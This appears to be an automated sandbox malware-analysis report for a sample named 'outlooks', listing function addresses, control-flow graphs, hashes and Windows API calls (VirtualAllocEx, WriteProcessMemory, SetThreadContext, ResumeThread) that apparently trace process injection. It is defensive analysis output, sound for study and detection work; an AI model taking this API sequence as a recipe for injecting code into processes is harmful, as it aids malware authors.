                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: e75b8414723704616b2a993094678adf9fd0e0d113ab84dbb86ee7302c49667a
                                                                            • Instruction ID: e58b694e218b9fb31f09083b859f54085bc5421834023d4eb2c2eaf153ff85db
                                                                            • Opcode Fuzzy Hash: e75b8414723704616b2a993094678adf9fd0e0d113ab84dbb86ee7302c49667a
                                                                            • Instruction Fuzzy Hash: 112136718013599FDB10DFAAC881BDEBBF5FF48320F10882AE519A7240C7399500CFA5
                                                                            Function 0893B100 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 188 893b100-893b193 VirtualAllocEx 191 893b195-893b19b 188->191 192 893b19c-893b1c1 188->192 191->192
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0893B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: e89c5bedc72389011f500317394a382c220018d51fcac8d87f3e2953038a175d
                                                                            • Instruction ID: 28ab2bf337da969bf37ce457fa695e135d0231f93cc90988933fc10b986dd2ad
                                                                            • Opcode Fuzzy Hash: e89c5bedc72389011f500317394a382c220018d51fcac8d87f3e2953038a175d
                                                                            • Instruction Fuzzy Hash: 422156718003489FDB21DFAAC845BEEBBF5EF88720F148819E419A7250C7799900CFA1
                                                                            Function 0893AC38 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 196 893ac38-893ac83 198 893ac93-893acc3 Wow64SetThreadContext 196->198 199 893ac85-893ac91 196->199 201 893acc5-893accb 198->201 202 893accc-893acfc 198->202 199->198 201->202
                                                                            APIs
                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0893ACB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ContextThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 983334009-0
                                                                            • Opcode ID: 5b9963f0f14cb04cabf39e5949ab4a93771d590b3dccde7343e31b80ce83cb5c
                                                                            • Instruction ID: 4b2939ccf75c8ad9c246bd067e863d3082eb367d28c26a9e95ed76c779df0b67
                                                                            • Opcode Fuzzy Hash: 5b9963f0f14cb04cabf39e5949ab4a93771d590b3dccde7343e31b80ce83cb5c
                                                                            • Instruction Fuzzy Hash: 492154719007188FDB10DFAAC885BEEBBF5EF48224F10842AD459A7240CB78A944CFA0
                                                                            Function 0893B2C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 206 893b2c8-893b355 ReadProcessMemory 209 893b357-893b35d 206->209 210 893b35e-893b38e 206->210 209->210
                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0893B348
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 6d4afbe8389a8fa9132a3b79c81af6121662852ab0a6e3e4d3b413d4e3890dcd
                                                                            • Instruction ID: 5244be55c06fc6ee985b384f32527d1aa14f4e40407e71e46d57beba12958c80
                                                                            • Opcode Fuzzy Hash: 6d4afbe8389a8fa9132a3b79c81af6121662852ab0a6e3e4d3b413d4e3890dcd
                                                                            • Instruction Fuzzy Hash: F02128718003599FDB10DFAAC885BDEBBF5FF48320F10842AE519A7240C7799540CBA5
                                                                            Function 0893AB80 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 214 893ab80-893abf7 ResumeThread 218 893ac00-893ac25 214->218 219 893abf9-893abff 214->219 219->218
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 125be1fac9b9185e0f0052ccab6a7ee2dc1044ce8515da2a5effcd950452e5d7
                                                                            • Instruction ID: 7e48658add949caeaef3c9167ab7c9b8f057b6bc427a81235f12ea3fccb2c26d
                                                                            • Opcode Fuzzy Hash: 125be1fac9b9185e0f0052ccab6a7ee2dc1044ce8515da2a5effcd950452e5d7
                                                                            • Instruction Fuzzy Hash: 8F118B718003588FDB20DFAAC8457DEFBF9EF89720F108819D419A7200CB39A544CFA5
                                                                            Function 0893B118 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 223 893b118-893b193 VirtualAllocEx 226 893b195-893b19b 223->226 227 893b19c-893b1c1 223->227 226->227
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0893B186
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 3afce46bebb0f3e73f5651abec8ba1a30170374c5132313b8397d6d71bd1c265
                                                                            • Instruction ID: d05bed753b2270ba02293645ff558b11776fe44221605f447c02a7fa9661255b
                                                                            • Opcode Fuzzy Hash: 3afce46bebb0f3e73f5651abec8ba1a30170374c5132313b8397d6d71bd1c265
                                                                            • Instruction Fuzzy Hash: 221137719003499FDB10DFAAC845BDFBBF5EF48720F148819E519A7250CB79A940CFA1
                                                                            Function 0893AB88 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 231 893ab88-893abf7 ResumeThread 234 893ac00-893ac25 231->234 235 893abf9-893abff 231->235 235->234
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: b430bacb59c3562e50220f59aee5011061202415c60c8d00222f5e97c39db035
                                                                            • Instruction ID: 9d65c1d17631d005fae4cab43b267eba8fc5c415eda5e626fd7a4b6df1f82251
                                                                            • Opcode Fuzzy Hash: b430bacb59c3562e50220f59aee5011061202415c60c8d00222f5e97c39db035
                                                                            • Instruction Fuzzy Hash: B6113A719007588FDB24DFAAC8457DEFBF9EF88724F248819D419A7240CB79A540CFA5
                                                                            Function 0893AD8C Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 239 893ad8c-893ad8d 240 893adf9-893e572 PostMessageW 239->240 241 893ad8f 239->241 243 893e574-893e57a 240->243 244 893e57b-893e58f 240->244 241->240 243->244
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0893E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 6d75b55d844379d9a36801b68295bc1b6b37a6db2ced074f1fca926e86225aa6
                                                                            • Instruction ID: d8b054a9ab21a508a403205e380dbade24a8dece0f7c832f45fb1b86963933a3
                                                                            • Opcode Fuzzy Hash: 6d75b55d844379d9a36801b68295bc1b6b37a6db2ced074f1fca926e86225aa6
                                                                            • Instruction Fuzzy Hash: EE11F5B5800358DFDB20DF9AC889BDEFBF8EB48724F108419E515A7600D375A944CFA5
                                                                            Function 0321EBD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0321EC3E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1554343377.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_3210000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: a424ee4a350c489256ff659bee7a90b96f8272615e5d45df32087a3eda49747b
                                                                            • Instruction ID: 8192ca6c409b47aae45a380649080294d6a3cbc7711c1cbc5705bfd0c4f07ffd
                                                                            • Opcode Fuzzy Hash: a424ee4a350c489256ff659bee7a90b96f8272615e5d45df32087a3eda49747b
                                                                            • Instruction Fuzzy Hash: BF1110B5C002498FDB24CF9AC944BDEFBF5EF88720F15881AD819A7200C379A545CFA1
                                                                            Function 0893ADF4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0893E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 885d1b5cfa52aca0c87fe47f6d651094f688f255f69b52ff43f385aa3b0bd23a
                                                                            • Instruction ID: 6f78bb88f8533d750e6c242cac760e051756f56876709476a725c7a16b38a529
                                                                            • Opcode Fuzzy Hash: 885d1b5cfa52aca0c87fe47f6d651094f688f255f69b52ff43f385aa3b0bd23a
                                                                            • Instruction Fuzzy Hash: D41106B5800358DFDB10DF9AC885BDEFBF8EB48724F108419E515A7600D375A954CFA5
                                                                            Function 0893E500 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0893E565
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1614868784.0000000008930000.00000040.00000800.00020000.00000000.sdmp, Offset: 08930000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_8930000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 3366531e5f7bdd3caaf9070445cd51ce134f3beebe39d72eb3dbde895caa8443
                                                                            • Instruction ID: 9487c2d13252d8a5ccbc6c7f052796f18e03f502720ed278a467445f2a791967
                                                                            • Opcode Fuzzy Hash: 3366531e5f7bdd3caaf9070445cd51ce134f3beebe39d72eb3dbde895caa8443
                                                                            • Instruction Fuzzy Hash: FF1106B5800359CFDB20DF9AD885BDEBBF4FB48710F108419E418A7600D379A544CFA5
                                                                            Function 0181D4C4 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1549057933.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_181d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80b3fd983144f6592a4d5c2eb27cc987fd3e4a6efce668563ce57f8e5ca57395
                                                                            • Instruction ID: 9df23dd1f093745f43fdbedf5d81237c604066e9f5894439f47c5e2b5b30afcc
                                                                            • Opcode Fuzzy Hash: 80b3fd983144f6592a4d5c2eb27cc987fd3e4a6efce668563ce57f8e5ca57395
                                                                            • Instruction Fuzzy Hash: 7A2148B2500344DFDB15DF54D8C4F66BF69FB84318F20C269E8098B25AC336D506CBA2
                                                                            Function 0183D01C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1550399878.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_183d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 044b6eadc40530d4e506ce37ea82f9d1d664df13662d29bb088dc09895ecdd5a
                                                                            • Instruction ID: ce01f52d53b684191a018271e6e7e42bd7d89e8cc326c7a66aaa630d6b9aa203
                                                                            • Opcode Fuzzy Hash: 044b6eadc40530d4e506ce37ea82f9d1d664df13662d29bb088dc09895ecdd5a
                                                                            • Instruction Fuzzy Hash: 0F2103B1504304DFDB15DF94D8D0B16FB65FBC4B14F68C669D8498B252C33AD507CAA1
                                                                            Function 0181D4BF Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1549057933.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_181d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                                                            • Instruction ID: f3813cf42eb8c1b818807014f345c1334383ce1d3efed3a41d0111ac6420bbd9
                                                                            • Opcode Fuzzy Hash: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
                                                                            • Instruction Fuzzy Hash: 131103B2404280CFCB06CF54D5C4B56BF72FB84318F24C6A9E8494B65BC336D556CBA1
                                                                            Function 0183D017 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.1550399878.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_183d000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                                                            • Instruction ID: d5c8c68356f3e69ffdca71717447732dcd7e939aef8ee4ce16bd396b2f23564c
                                                                            • Opcode Fuzzy Hash: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
                                                                            • Instruction Fuzzy Hash: 8411BB75504280CFCB12CF54D5D4B15FFA2FB84714F28C6AAD8498B656C33AD54ACBA2

                                                                            Execution Graph

                                                                            Execution Coverage:14.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:179
                                                                            Total number of Limit Nodes:12
                                                                            execution_graph 22161 32f77a8 22162 32f77b2 22161->22162 22164 32f7ca0 22161->22164 22165 32f7cc5 22164->22165 22169 32f7d9f 22165->22169 22173 32f7db0 22165->22173 22171 32f7db0 22169->22171 22170 32f7eb4 22170->22170 22171->22170 22177 32f79dc 22171->22177 22175 32f7dd7 22173->22175 22174 32f7eb4 22174->22174 22175->22174 22176 32f79dc CreateActCtxA 22175->22176 22176->22174 22178 32f8e40 CreateActCtxA 22177->22178 22180 32f8f03 22178->22180 22188 886b891 22189 886b95c 22188->22189 22190 886b89b 22188->22190 22194 886d080 22190->22194 22212 886d0f6 22190->22212 22231 886d090 22190->22231 22195 886d090 22194->22195 22249 886d75f 22195->22249 22253 886d57f 22195->22253 22258 886d8fe 22195->22258 22263 886d5b3 22195->22263 22271 886e014 22195->22271 22277 886d654 22195->22277 22282 886d6f6 22195->22282 22287 886dd2b 22195->22287 22292 886d58e 22195->22292 22297 886d3c0 22195->22297 22303 886d5a0 22195->22303 22308 886d882 22195->22308 22313 886d7b8 22195->22313 22320 886d5dc 22195->22320 22324 886d67c 22195->22324 22196 886d0b2 22196->22189 22213 886d084 22212->22213 22215 886d0f9 22212->22215 22216 886d882 2 API calls 22213->22216 22217 886d5a0 2 API calls 22213->22217 22218 886d3c0 2 API calls 22213->22218 22219 886d58e 2 API calls 22213->22219 22220 886dd2b 2 API calls 22213->22220 22221 886d6f6 2 API calls 22213->22221 22222 886d654 2 API calls 22213->22222 22223 886e014 2 API calls 22213->22223 22224 886d5b3 4 API calls 22213->22224 22225 886d8fe 2 API calls 22213->22225 22226 886d57f 2 API calls 22213->22226 22227 886d75f 2 API calls 22213->22227 22228 886d67c 2 API calls 22213->22228 22229 886d5dc 2 API calls 22213->22229 22230 886d7b8 4 API calls 22213->22230 22214 886d0b2 22214->22189 22215->22189 22216->22214 22217->22214 22218->22214 22219->22214 22220->22214 22221->22214 22222->22214 22223->22214 22224->22214 22225->22214 22226->22214 22227->22214 22228->22214 22229->22214 22230->22214 22232 886d0aa 22231->22232 22234 886d882 2 API calls 22232->22234 22235 886d5a0 2 API calls 22232->22235 22236 886d3c0 2 API calls 22232->22236 22237 886d58e 2 API calls 22232->22237 22238 886dd2b 2 API calls 22232->22238 22239 886d6f6 2 API calls 22232->22239 22240 886d654 2 API calls 22232->22240 22241 886e014 2 API calls 22232->22241 22242 886d5b3 4 API calls 22232->22242 22243 886d8fe 2 API calls 22232->22243 22244 886d57f 2 API calls 22232->22244 22245 886d75f 2 API calls 22232->22245 22246 886d67c 2 API calls 22232->22246 22247 886d5dc 2 API calls 22232->22247 22248 886d7b8 4 API calls 22232->22248 22233 886d0b2 22233->22189 22234->22233 22235->22233 22236->22233 22237->22233 22238->22233 22239->22233 22240->22233 22241->22233 22242->22233 22243->22233 22244->22233 22245->22233 22246->22233 22247->22233 22248->22233 22330 886b1d1 22249->22330 22334 886b1d8 22249->22334 22250 886d6a6 22250->22196 22254 886d575 22253->22254 22255 886d587 22254->22255 22338 886ac30 22254->22338 22342 886ac38 22254->22342 22255->22196 22259 886d575 22258->22259 22259->22258 22260 886d587 22259->22260 22261 886ac30 Wow64SetThreadContext 22259->22261 22262 886ac38 Wow64SetThreadContext 22259->22262 22260->22196 22261->22259 22262->22259 22264 886d5c5 22263->22264 22265 886d80c 22264->22265 22346 886b100 22264->22346 22350 886b118 22264->22350 22269 886b1d1 WriteProcessMemory 22265->22269 22270 886b1d8 WriteProcessMemory 22265->22270 22266 886dc58 22269->22266 22270->22266 22273 886d475 22271->22273 22272 886e00d 22272->22196 22273->22272 22354 886b460 22273->22354 22358 886b45b 22273->22358 22278 886d65e 22277->22278 22362 886ab80 22278->22362 22366 886ab88 22278->22366 22279 886d722 22283 886d6fc 22282->22283 22285 886ab80 ResumeThread 22283->22285 22286 886ab88 ResumeThread 22283->22286 22284 886d722 22285->22284 22286->22284 22288 886d575 22287->22288 22289 886d587 22288->22289 22290 886ac30 Wow64SetThreadContext 22288->22290 22291 886ac38 Wow64SetThreadContext 22288->22291 22289->22196 22290->22288 22291->22288 22293 886d9fc 22292->22293 22295 886b1d1 WriteProcessMemory 22293->22295 22296 886b1d8 WriteProcessMemory 22293->22296 22294 886dc01 22295->22294 22296->22294 22299 886d3f3 22297->22299 22298 886e00d 22298->22196 22299->22298 22301 886b460 CreateProcessA 22299->22301 22302 886b45b CreateProcessA 22299->22302 22300 886d54a 22301->22300 22302->22300 22304 886d5ad 22303->22304 22306 886ab80 ResumeThread 22304->22306 22307 886ab88 ResumeThread 22304->22307 22305 886d722 22306->22305 22307->22305 22309 886d888 22308->22309 22311 886b1d1 WriteProcessMemory 22309->22311 22312 886b1d8 WriteProcessMemory 22309->22312 22310 886dc58 22311->22310 22312->22310 22370 886b2c1 22313->22370 22374 886b2c8 22313->22374 22314 886d587 22314->22196 22315 886d575 22315->22314 22316 886ac30 Wow64SetThreadContext 22315->22316 22317 886ac38 Wow64SetThreadContext 22315->22317 22316->22315 22317->22315 22378 886e208 22320->22378 22383 886e218 22320->22383 22321 886d5f9 22325 886d689 22324->22325 22326 886dd9c 22325->22326 22328 886ab80 ResumeThread 22325->22328 22329 886ab88 ResumeThread 22325->22329 22326->22196 22327 886d722 22327->22327 22328->22327 22329->22327 22331 886b1d8 WriteProcessMemory 22330->22331 22333 886b277 22331->22333 22333->22250 22335 886b220 WriteProcessMemory 22334->22335 22337 886b277 22335->22337 22337->22250 22339 886ac7d Wow64SetThreadContext 22338->22339 22341 886acc5 22339->22341 22341->22254 22343 886ac7d Wow64SetThreadContext 22342->22343 22345 886acc5 22343->22345 22345->22254 22347 886b158 VirtualAllocEx 22346->22347 22349 886b195 22347->22349 22349->22265 22351 886b158 VirtualAllocEx 22350->22351 22353 886b195 22351->22353 22353->22265 22355 886b4e9 CreateProcessA 22354->22355 22357 886b6ab 22355->22357 22359 886b4e9 CreateProcessA 22358->22359 22361 886b6ab 22359->22361 22363 886ab88 ResumeThread 22362->22363 22365 886abf9 22363->22365 22365->22279 22367 886abc8 ResumeThread 22366->22367 22369 886abf9 22367->22369 22369->22279 22371 886b2c8 ReadProcessMemory 22370->22371 22373 886b357 22371->22373 22373->22315 22375 886b313 ReadProcessMemory 22374->22375 22377 886b357 22375->22377 22377->22315 22379 886e218 22378->22379 22381 886ac30 Wow64SetThreadContext 22379->22381 22382 886ac38 Wow64SetThreadContext 22379->22382 22380 886e243 22380->22321 22381->22380 22382->22380 22384 886e22d 22383->22384 22386 886ac30 Wow64SetThreadContext 22384->22386 22387 886ac38 Wow64SetThreadContext 22384->22387 22385 886e243 22385->22321 22386->22385 22387->22385 22388 32febd8 22389 32fec1a 22388->22389 22390 32fec20 GetModuleHandleW 22388->22390 22389->22390 22391 32fec4d 22390->22391 22181 886e288 22182 886e413 22181->22182 22184 886e2ae 22181->22184 22184->22182 22185 886adf4 22184->22185 22186 886e508 PostMessageW 22185->22186 22187 886e574 22186->22187 22187->22184

                                                                            Executed Functions

                                                                            Function 0886B45B Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 886b45b-886b4f5 2 886b4f7-886b501 0->2 3 886b52e-886b54e 0->3 2->3 4 886b503-886b505 2->4 10 886b587-886b5b6 3->10 11 886b550-886b55a 3->11 5 886b507-886b511 4->5 6 886b528-886b52b 4->6 8 886b515-886b524 5->8 9 886b513 5->9 6->3 8->8 12 886b526 8->12 9->8 17 886b5ef-886b6a9 CreateProcessA 10->17 18 886b5b8-886b5c2 10->18 11->10 13 886b55c-886b55e 11->13 12->6 15 886b560-886b56a 13->15 16 886b581-886b584 13->16 19 886b56e-886b57d 15->19 20 886b56c 15->20 16->10 31 886b6b2-886b738 17->31 32 886b6ab-886b6b1 17->32 18->17 21 886b5c4-886b5c6 18->21 19->19 22 886b57f 19->22 20->19 23 886b5c8-886b5d2 21->23 24 886b5e9-886b5ec 21->24 22->16 26 886b5d6-886b5e5 23->26 27 886b5d4 23->27 24->17 26->26 28 886b5e7 26->28 27->26 28->24 42 886b73a-886b73e 31->42 43 886b748-886b74c 31->43 32->31 42->43 44 886b740 42->44 45 886b74e-886b752 43->45 46 886b75c-886b760 43->46 44->43 45->46 47 886b754 45->47 48 886b762-886b766 46->48 49 886b770-886b774 46->49 47->46 48->49 50 886b768 48->50 51 886b786-886b78d 49->51 52 886b776-886b77c 49->52 50->49 53 886b7a4 51->53 54 886b78f-886b79e 51->54 52->51 56 886b7a5 53->56 54->53 56->56
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0886B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 9f446cb09981499a8874f0bd4dfa0d9caca8255bad683b118f0c06cad4087259
                                                                            • Instruction ID: d68f815f60dd9d650bd6c85c05c8c5db3eb17f5f51e9f1d60a27b26838d5f141
                                                                            • Opcode Fuzzy Hash: 9f446cb09981499a8874f0bd4dfa0d9caca8255bad683b118f0c06cad4087259
                                                                            • Instruction Fuzzy Hash: ECA14771D00219CFEB20CFA8C845BEEBBB2BF48325F1481A9D809E7240DB749995CF91
                                                                            Function 0886B460 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 57 886b460-886b4f5 59 886b4f7-886b501 57->59 60 886b52e-886b54e 57->60 59->60 61 886b503-886b505 59->61 67 886b587-886b5b6 60->67 68 886b550-886b55a 60->68 62 886b507-886b511 61->62 63 886b528-886b52b 61->63 65 886b515-886b524 62->65 66 886b513 62->66 63->60 65->65 69 886b526 65->69 66->65 74 886b5ef-886b6a9 CreateProcessA 67->74 75 886b5b8-886b5c2 67->75 68->67 70 886b55c-886b55e 68->70 69->63 72 886b560-886b56a 70->72 73 886b581-886b584 70->73 76 886b56e-886b57d 72->76 77 886b56c 72->77 73->67 88 886b6b2-886b738 74->88 89 886b6ab-886b6b1 74->89 75->74 78 886b5c4-886b5c6 75->78 76->76 79 886b57f 76->79 77->76 80 886b5c8-886b5d2 78->80 81 886b5e9-886b5ec 78->81 79->73 83 886b5d6-886b5e5 80->83 84 886b5d4 80->84 81->74 83->83 85 886b5e7 83->85 84->83 85->81 99 886b73a-886b73e 88->99 100 886b748-886b74c 88->100 89->88 99->100 101 886b740 99->101 102 886b74e-886b752 100->102 103 886b75c-886b760 100->103 101->100 102->103 104 886b754 102->104 105 886b762-886b766 103->105 106 886b770-886b774 103->106 104->103 105->106 107 886b768 105->107 108 886b786-886b78d 106->108 109 886b776-886b77c 106->109 107->106 110 886b7a4 108->110 111 886b78f-886b79e 108->111 109->108 113 886b7a5 110->113 111->110 113->113
                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0886B696
                                                                            Memory Dump Source
                                                                            • Source File: 0000000F.00000002.1775299345.0000000008860000.00000040.00000800.00020000.00000000.sdmp, Offset: 08860000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_15_2_8860000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 5befc7f4edc56bbc3e19994884d821a19b50bdaaff4fb8bc594861e7c0c6377c
                                                                            • Instruction ID: cef869da0623fa432ca9d83485eaf6de037aa0e5134812f6e740cf646f181d9f
                                                                            • Opcode Fuzzy Hash: 5befc7f4edc56bbc3e19994884d821a19b50bdaaff4fb8bc594861e7c0c6377c
                                                                            • Instruction Fuzzy Hash: 04914671D003198FEB20CFA8C845BEEBBB2BF48325F1481A9D809E7240DB749995CF91
                                                                            Function 032F8E34 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 114 32f8e34-32f8e3e 115 32f8e40-32f8f01 CreateActCtxA 114->115 117 32f8f0a-32f8f64 115->117 118 32f8f03-32f8f09 115->118 125 32f8f66-32f8f69 117->125 126 32f8f73-32f8f77 117->126 118->117 125->126 127 32f8f79-32f8f85 126->127 128 32f8f88 126->128 127->128 130 32f8f89 128->130 130->130
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 032F8EF1
                                                                            Memory Dump Source
